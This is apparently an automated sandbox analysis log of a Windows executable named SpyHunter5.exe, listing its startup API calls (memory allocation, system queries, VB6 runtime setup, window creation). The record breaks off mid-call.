# Flog Txt Version 1 # Analyzer Version: 3.0.1 # Analyzer Build Date: Apr 9 2019 11:17:16 # Log Creation Date: 17.04.2019 09:51:55.147 Process: id = "1" image_name = "spyhunter5.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\spyhunter5.exe" page_root = "0x491c7000" os_pid = "0xa44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xa48 [0058.096] GetVersion () returned 0x1db10106 [0058.097] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0058.391] GetProcAddress (hModule=0x76c20000, lpProcName="IsTNT") returned 0x0 [0058.391] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x220000 [0058.391] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0x1d80000 [0058.392] VirtualAlloc (lpAddress=0x1d80000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d80000 [0058.393] GetCurrentThreadId () returned 0xa48 [0058.393] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe\" " [0058.393] GetEnvironmentStringsW () returned 0x574958* [0058.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0058.394] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x570) returned 0x2207d0 [0058.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2207d0, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0058.394] FreeEnvironmentStringsW (penv=0x574958) returned 1 [0058.394] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x480) returned 0x220d48 [0058.394] GetStartupInfoA (in: lpStartupInfo=0x18f9b8 | out: lpStartupInfo=0x18f9b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0058.394] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0058.394] GetFileType (hFile=0x0) returned 0x0 [0058.394] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0058.394] GetFileType (hFile=0x0) returned 0x0 [0058.394] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0058.394] GetFileType (hFile=0x0) returned 0x0 [0058.394] SetHandleCount (uNumber=0x20) returned 0x20 [0058.394] GetACP () returned 0x4e4 [0058.394] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f9e0 | out: lpCPInfo=0x18f9e0) returned 1 [0058.394] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72a4c528, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\spyhunter5.exe")) returned 0x34 [0058.396] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x2207d0 | out: hHeap=0x220000) returned 1 [0058.396] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76c20000 [0058.396] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0058.396] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0058.396] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x800) returned 0x2211d0 [0058.497] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x7c [0058.497] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x80 [0058.497] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0058.497] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x72a4e6c8, nSize=0x104 | out: lpFilename="c:\\windows\\system32\\msvbvm60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0058.497] GetVersion () returned 0x1db10106 [0058.497] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0058.501] GetUserDefaultLCID () returned 0x409 [0058.501] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0058.502] GetSystemMetrics (nIndex=5) returned 1 [0058.502] GetSystemMetrics (nIndex=6) returned 1 [0058.502] GetSystemMetrics (nIndex=11) returned 32 [0058.502] GetSystemMetrics (nIndex=12) returned 32 [0058.502] GetSystemMetrics (nIndex=34) returned 132 [0058.502] GetSystemMetrics (nIndex=35) returned 38 [0058.502] GetSystemMetrics (nIndex=0) returned 1440 [0058.502] GetSystemMetrics (nIndex=1) returned 900 [0058.502] GetSystemMetrics (nIndex=32) returned 8 [0058.502] GetSystemMetrics (nIndex=33) returned 8 [0058.502] GetSystemMetrics (nIndex=42) returned 0 [0058.502] GetStockObject (i=15) returned 0x188000b [0058.502] GetStockObject (i=7) returned 0x1b00017 [0058.502] GetStockObject (i=6) returned 0x1b00018 [0058.502] GetStockObject (i=8) returned 0x1b00016 [0058.502] GetStockObject (i=4) returned 0x1900011 [0058.502] GetStockObject (i=2) returned 0x1900012 [0058.502] GetStockObject (i=0) returned 0x1900010 [0058.502] GetStockObject (i=5) returned 0x1900015 [0058.502] GetStockObject (i=13) returned 0x18a002e [0058.502] GetDC (hWnd=0x0) returned 0x701084c [0058.503] GetTextExtentPointA (in: hdc=0x701084c, lpString="0", c=1, lpsz=0x18f9dc | out: lpsz=0x18f9dc) returned 1 [0058.505] GetDeviceCaps (hdc=0x701084c, index=14) returned 1 [0058.505] GetDeviceCaps (hdc=0x701084c, index=12) returned 32 [0058.505] GetDeviceCaps (hdc=0x701084c, index=88) returned 96 [0058.505] GetDeviceCaps (hdc=0x701084c, index=90) returned 96 [0058.505] GetDeviceCaps (hdc=0x701084c, index=38) returned 32409 [0058.505] ReleaseDC (hWnd=0x0, hDC=0x701084c) returned 1 [0058.505] HeapCreate (flOptions=0x0, dwInitialSize=0x0, dwMaximumSize=0x0) returned 0x2620000 [0058.506] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e7d0 | out: ppMalloc=0x72a4e7d0*=0x757266bc) returned 0x0 [0058.506] GetCurrentThreadId () returned 0xa48 [0058.506] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0058.506] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x104) returned 0x26207d0 [0058.507] GetCurrentThreadId () returned 0xa48 [0058.507] GetCurrentThreadId () returned 0xa48 [0058.507] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xec8) returned 0x26208e0 [0058.507] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe\" " [0058.507] lstrlenA (lpString="") returned 0 [0058.507] lstrcpyA (in: lpString1=0x18feac, lpString2="" | out: lpString1="") returned="" [0058.507] SetErrorMode (uMode=0x8001) returned 0x0 [0058.507] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fb68, nSize=0x104 | out: lpFilename="c:\\windows\\system32\\msvbvm60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0058.507] GetUserDefaultLCID () returned 0x409 [0058.507] lstrcpyA (in: lpString1=0x18f868, lpString2="*" | out: lpString1="*") returned="*" [0058.507] LoadStringA (in: hInstance=0x72940000, uID=0x7d1, lpBuffer=0x18fc6c, cchBufferMax=8 | out: lpBuffer="409") returned 0x3 [0058.508] GetSystemDefaultLCID () returned 0x409 [0058.508] GetUserDefaultLCID () returned 0x409 [0058.508] GetLocaleInfoA (in: Locale=0x400, LCType=0xe, lpLCData=0x18fc76, cchData=2 | out: lpLCData=".") returned 2 [0058.508] GetStockObject (i=13) returned 0x18a002e [0058.508] GetObjectA (in: h=0x18a002e, c=60, pv=0x18fc3c | out: pv=0x18fc3c) returned 60 [0058.508] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0058.508] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0058.508] lstrlenA (lpString="{xx}") returned 4 [0058.508] lstrlenA (lpString="VB98.CHM") returned 8 [0058.508] lstrcpyA (in: lpString1=0x72a4eae8, lpString2="VB98.CHM" | out: lpString1="VB98.CHM") returned="VB98.CHM" [0058.508] GetLocaleInfoA (in: Locale=0x409, LCType=0x80000003, lpLCData=0x18fc38, cchData=4 | out: lpLCData="ENU") returned 4 [0058.508] lstrcpyA (in: lpString1=0x18fc68, lpString2="EN" | out: lpString1="EN") returned="EN" [0058.508] lstrlenA (lpString="{xx}") returned 4 [0058.508] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0058.508] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0058.508] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fd90, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\spyhunter5.exe")) returned 0x34 [0058.508] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x18fc8c, nSize=0x104 | out: lpFilename="c:\\windows\\system32\\msvbvm60.DLL" (normalized: "c:\\windows\\system32\\msvbvm60.dll")) returned 0x20 [0058.508] lstrcpynA (in: lpString1=0x18fb70, lpString2="c:\\windows\\system32\\msvbvm60.DLL", iMaxLength=260 | out: lpString1="c:\\windows\\system32\\msvbvm60.DLL") returned="c:\\windows\\system32\\msvbvm60.DLL" [0058.508] lstrlenA (lpString="c:\\windows\\system32\\msvbvm60.DLL") returned 32 [0058.508] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x21) returned 0x26217b0 [0058.508] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0x21) returned 0x26217e0 [0058.508] lstrcpyA (in: lpString1=0x26217b0, lpString2="c:\\windows\\system32\\msvbvm60.DLL" | out: lpString1="c:\\windows\\system32\\msvbvm60.DLL") returned="c:\\windows\\system32\\msvbvm60.DLL" [0058.509] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe", cchSrc=-1, lpDestStr=0x18fb50, cchDest=260 | out: lpDestStr="C:\\USERS\\5P5NRGJN0JS HALPMCXZ\\DESKTOP\\SPYHUNTER5.EXE") returned 53 [0058.510] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fc54, dwRevision=0x1 | out: pSecurityDescriptor=0x18fc54) returned 1 [0058.510] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fc54, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fc54) returned 1 [0058.510] CreateSemaphoreA (lpSemaphoreAttributes=0x18fc68, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?5P5NRGJN0JS HALPMCXZ?DESKTOP?SPYHUNTER5.EXE") returned 0x90 [0058.510] GetLastError () returned 0x0 [0058.510] GetVersionExA (in: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fbcc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0058.510] OleInitialize (pvReserved=0x0) returned 0x0 [0058.909] OaBuildVersion () returned 0x321396 [0058.909] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x75220000 [0058.909] GetLastError () returned 0x0 [0058.909] GetProcAddress (hModule=0x75220000, lpProcName="OleLoadPictureEx") returned 0x752870a1 [0058.909] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc13f [0058.909] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b1 [0058.909] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0058.910] RegisterClassA (lpWndClass=0x18fc34) returned 0xc141 [0058.910] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x18fc34 | out: lpWndClass=0x18fc34) returned 0 [0058.910] RegisterClassA (lpWndClass=0x18fc34) returned 0xc140 [0058.910] HeapCreate (flOptions=0x0, dwInitialSize=0x400, dwMaximumSize=0x0) returned 0x2780000 [0058.910] GetUserDefaultLCID () returned 0x409 [0058.910] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x3a4) returned 0x2621810 [0058.910] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x3a4) returned 0x2621bc0 [0058.910] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0xd4) returned 0x2621f70 [0058.910] GetSystemInfo (in: lpSystemInfo=0x18fbf4 | out: lpSystemInfo=0x18fbf4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0058.911] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x210000 [0058.911] VirtualAlloc (lpAddress=0x210000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0058.911] VirtualAlloc (lpAddress=0x210000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0058.911] VirtualAlloc (lpAddress=0x210000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0058.911] VirtualAlloc (lpAddress=0x210000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0058.911] VirtualAlloc (lpAddress=0x210000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0058.912] VirtualAlloc (lpAddress=0x210000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0058.912] VirtualProtect (in: lpAddress=0x210000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x18fc50 | out: lpflOldProtect=0x18fc50*=0x4) returned 1 [0058.920] GetCurrentProcess () returned 0xffffffff [0058.920] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x210000, dwSize=0x6000) returned 1 [0058.920] GlobalAddAtomA (lpString="VBDisabled") returned 0xc164 [0058.920] GetVersion () returned 0x1db10106 [0058.920] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x75220000 [0058.921] GetProcAddress (hModule=0x75220000, lpProcName="DispCallFunc") returned 0x75233dcf [0058.921] GetProcAddress (hModule=0x75220000, lpProcName="LoadTypeLibEx") returned 0x752307b7 [0058.921] GetProcAddress (hModule=0x75220000, lpProcName="UnRegisterTypeLib") returned 0x75251ca9 [0058.921] GetProcAddress (hModule=0x75220000, lpProcName="CreateTypeLib2") returned 0x75238e70 [0058.921] GetProcAddress (hModule=0x75220000, lpProcName="VarDateFromUdate") returned 0x75237684 [0058.921] GetProcAddress (hModule=0x75220000, lpProcName="VarUdateFromDate") returned 0x7523cc98 [0058.921] GetProcAddress (hModule=0x75220000, lpProcName="GetAltMonthNames") returned 0x7526903a [0058.921] GetProcAddress (hModule=0x75220000, lpProcName="VarNumFromParseNum") returned 0x75236231 [0058.921] GetProcAddress (hModule=0x75220000, lpProcName="VarParseNumFromStr") returned 0x75235fea [0058.921] GetProcAddress (hModule=0x75220000, lpProcName="VarDecFromR4") returned 0x75243f94 [0058.922] GetProcAddress (hModule=0x75220000, lpProcName="VarDecFromR8") returned 0x75244e9e [0058.922] GetProcAddress (hModule=0x75220000, lpProcName="VarDecFromDate") returned 0x7526db72 [0058.922] GetProcAddress (hModule=0x75220000, lpProcName="VarDecFromI4") returned 0x75252a8c [0058.922] GetProcAddress (hModule=0x75220000, lpProcName="VarDecFromCy") returned 0x7526d737 [0058.922] GetProcAddress (hModule=0x75220000, lpProcName="VarR4FromDec") returned 0x7526e015 [0058.922] GetProcAddress (hModule=0x75220000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7526cc3d [0058.922] GetProcAddress (hModule=0x75220000, lpProcName="GetRecordInfoFromGuids") returned 0x7526d1c4 [0058.922] GetProcAddress (hModule=0x75220000, lpProcName="SafeArrayGetRecordInfo") returned 0x7526d48c [0058.922] GetProcAddress (hModule=0x75220000, lpProcName="SafeArraySetRecordInfo") returned 0x7526d4c6 [0058.922] GetProcAddress (hModule=0x75220000, lpProcName="SafeArrayGetIID") returned 0x7526d509 [0058.922] GetProcAddress (hModule=0x75220000, lpProcName="SafeArraySetIID") returned 0x7523e7bb [0058.923] GetProcAddress (hModule=0x75220000, lpProcName="SafeArrayCopyData") returned 0x7523e496 [0058.923] GetProcAddress (hModule=0x75220000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x7523ddf1 [0058.923] GetProcAddress (hModule=0x75220000, lpProcName="SafeArrayCreateEx") returned 0x7526d53f [0058.923] GetProcAddress (hModule=0x75220000, lpProcName="VarFormat") returned 0x75272055 [0058.923] GetProcAddress (hModule=0x75220000, lpProcName="VarFormatDateTime") returned 0x752720ea [0058.923] GetProcAddress (hModule=0x75220000, lpProcName="VarFormatNumber") returned 0x75272151 [0058.923] GetProcAddress (hModule=0x75220000, lpProcName="VarFormatPercent") returned 0x752721f5 [0058.923] GetProcAddress (hModule=0x75220000, lpProcName="VarFormatCurrency") returned 0x75272288 [0058.923] GetProcAddress (hModule=0x75220000, lpProcName="VarWeekdayName") returned 0x75272335 [0058.923] GetProcAddress (hModule=0x75220000, lpProcName="VarMonthName") returned 0x752723d5 [0058.924] GetProcAddress (hModule=0x75220000, lpProcName="VarAdd") returned 0x75245934 [0058.924] GetProcAddress (hModule=0x75220000, lpProcName="VarAnd") returned 0x75245a98 [0058.924] GetProcAddress (hModule=0x75220000, lpProcName="VarCat") returned 0x752459b4 [0058.924] GetProcAddress (hModule=0x75220000, lpProcName="VarDiv") returned 0x7529e405 [0058.924] GetProcAddress (hModule=0x75220000, lpProcName="VarEqv") returned 0x7529ef07 [0058.924] GetProcAddress (hModule=0x75220000, lpProcName="VarIdiv") returned 0x7529f00a [0058.924] GetProcAddress (hModule=0x75220000, lpProcName="VarImp") returned 0x7529ef47 [0058.924] GetProcAddress (hModule=0x75220000, lpProcName="VarMod") returned 0x7529f15e [0058.924] GetProcAddress (hModule=0x75220000, lpProcName="VarMul") returned 0x7529dbd4 [0058.924] GetProcAddress (hModule=0x75220000, lpProcName="VarOr") returned 0x7529ecfa [0058.925] GetProcAddress (hModule=0x75220000, lpProcName="VarPow") returned 0x7529ea66 [0058.925] GetProcAddress (hModule=0x75220000, lpProcName="VarSub") returned 0x7529d332 [0058.925] GetProcAddress (hModule=0x75220000, lpProcName="VarXor") returned 0x7529ee2e [0058.925] GetProcAddress (hModule=0x75220000, lpProcName="VarAbs") returned 0x7529ca11 [0058.925] GetProcAddress (hModule=0x75220000, lpProcName="VarFix") returned 0x7529cc5f [0058.925] GetProcAddress (hModule=0x75220000, lpProcName="VarInt") returned 0x7529cde7 [0058.925] GetProcAddress (hModule=0x75220000, lpProcName="VarNeg") returned 0x7529c802 [0058.925] GetProcAddress (hModule=0x75220000, lpProcName="VarNot") returned 0x7529ec66 [0058.925] GetProcAddress (hModule=0x75220000, lpProcName="VarRound") returned 0x7529d155 [0058.925] GetProcAddress (hModule=0x75220000, lpProcName="VarCmp") returned 0x7523b0dc [0058.925] GetProcAddress (hModule=0x75220000, lpProcName="VarDecAdd") returned 0x75255f3e [0058.926] GetProcAddress (hModule=0x75220000, lpProcName="VarDecCmp") returned 0x75244fd0 [0058.926] GetProcAddress (hModule=0x75220000, lpProcName="VarBstrCat") returned 0x75240d2c [0058.926] GetProcAddress (hModule=0x75220000, lpProcName="VarCyMulI4") returned 0x752559ed [0058.926] GetProcAddress (hModule=0x75220000, lpProcName="VarBstrCmp") returned 0x7522f8b8 [0058.926] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x755e0000 [0058.926] GetProcAddress (hModule=0x755e0000, lpProcName="CoCreateInstanceEx") returned 0x75629d4e [0058.926] GetProcAddress (hModule=0x755e0000, lpProcName="CLSIDFromProgIDEx") returned 0x755f0782 [0058.926] GetSystemMetrics (nIndex=42) returned 0 [0058.926] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x757266bc) returned 0x0 [0058.927] IMalloc:Alloc (This=0x757266bc, cb=0x4) returned 0x578e90 [0058.927] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f968, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\spyhunter5.exe")) returned 0x34 [0058.971] lstrcatA (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe", lpString2=".cfg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe.cfg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe.cfg" [0058.971] SetLastError (dwErrCode=0x0) [0058.971] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x18f864, lpFilePart=0x18f838 | out: lpBuffer="|ú\x18", lpFilePart=0x18f838) returned 0x0 [0058.971] SetLastError (dwErrCode=0x2) [0058.971] GetLastError () returned 0x2 [0058.971] lstrcmpiA (lpString1="SpyHunter5", lpString2="MTX") returned 1 [0058.971] lstrcmpiA (lpString1="SpyHunter5", lpString2="DLLHOST") returned 1 [0058.971] lstrcmpiA (lpString1="SpyHunter5", lpString2="INETINFO") returned 1 [0058.971] lstrcmpiA (lpString1="SpyHunter5", lpString2="W3WP") returned -1 [0058.972] lstrcmpiA (lpString1="SpyHunter5", lpString2="ASPNET_WP") returned 1 [0058.972] lstrcmpiA (lpString1="SpyHunter5", lpString2="DLLHST3G") returned 1 [0058.972] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f95c, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SpyHunter5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\spyhunter5.exe")) returned 0x34 [0058.972] lstrcmpiA (lpString1="SpyHunter5", lpString2="IEXPLORE") returned 1 [0058.972] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x74b10000 [0059.169] GetLastError () returned 0x0 [0059.169] GetProcAddress (hModule=0x74b10000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x74b57685 [0059.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18feac, cbMultiByte=-1, lpWideCharStr=0x18fea8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0059.169] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x1c) returned 0x2622050 [0059.170] CoRegisterMessageFilter (in: lpMessageFilter=0x2622054, lplpMessageFilter=0x262205c | out: lplpMessageFilter=0x262205c*=0x0) returned 0x0 [0059.170] IUnknown:AddRef (This=0x2622054) returned 0x2 [0059.170] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x18fe78 | out: lpwcx=0x18fe78) returned 0 [0059.170] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x50105 [0059.171] GetModuleHandleA (lpModuleName="USER32") returned 0x74f40000 [0059.171] GetProcAddress (hModule=0x74f40000, lpProcName="GetSystemMetrics") returned 0x74f57d2f [0059.171] GetProcAddress (hModule=0x74f40000, lpProcName="MonitorFromWindow") returned 0x74f63150 [0059.171] GetProcAddress (hModule=0x74f40000, lpProcName="MonitorFromRect") returned 0x74f7e7a0 [0059.171] GetProcAddress (hModule=0x74f40000, lpProcName="MonitorFromPoint") returned 0x74f65281 [0059.171] GetProcAddress (hModule=0x74f40000, lpProcName="EnumDisplayMonitors") returned 0x74f6451a [0059.171] GetProcAddress (hModule=0x74f40000, lpProcName="GetMonitorInfoA") returned 0x74f64413 [0059.171] GetSystemMetrics (nIndex=0) returned 1440 [0059.171] GetSystemMetrics (nIndex=78) returned 1440 [0059.171] GetSystemMetrics (nIndex=1) returned 900 [0059.171] GetSystemMetrics (nIndex=79) returned 900 [0059.171] GetSystemMetrics (nIndex=50) returned 16 [0059.171] GetSystemMetrics (nIndex=49) returned 16 [0059.171] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x1501ad [0059.172] RegisterClassExA (param_1=0x18fe78) returned 0x8ec13d [0059.172] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x50122 [0059.172] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x81, wParam=0x0, lParam=0x18fa5c) returned 0x1 [0059.173] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x83, wParam=0x0, lParam=0x18fa48) returned 0x0 [0059.173] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x1, wParam=0x0, lParam=0x18fa5c) returned 0x0 [0059.173] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0059.173] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0059.173] MonitorFromWindow (hwnd=0x50122, dwFlags=0x2) returned 0x10001 [0059.173] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x18fe80 | out: lpmi=0x18fe80) returned 1 [0059.173] SetWindowPos (hWnd=0x50122, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0059.173] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x46, wParam=0x0, lParam=0x18fe20) returned 0x0 [0059.174] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x47, wParam=0x0, lParam=0x18fe20) returned 0x0 [0059.174] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0059.174] ShowWindow (hWnd=0x50122, nCmdShow=4) returned 0 [0059.174] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0059.174] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x46, wParam=0x0, lParam=0x18fe34) returned 0x0 [0059.174] NtdllDefWindowProc_A (hWnd=0x50122, Msg=0x47, wParam=0x0, lParam=0x18fe34) returned 0x0 [0059.175] GetWindowThreadProcessId (in: hWnd=0x50122, 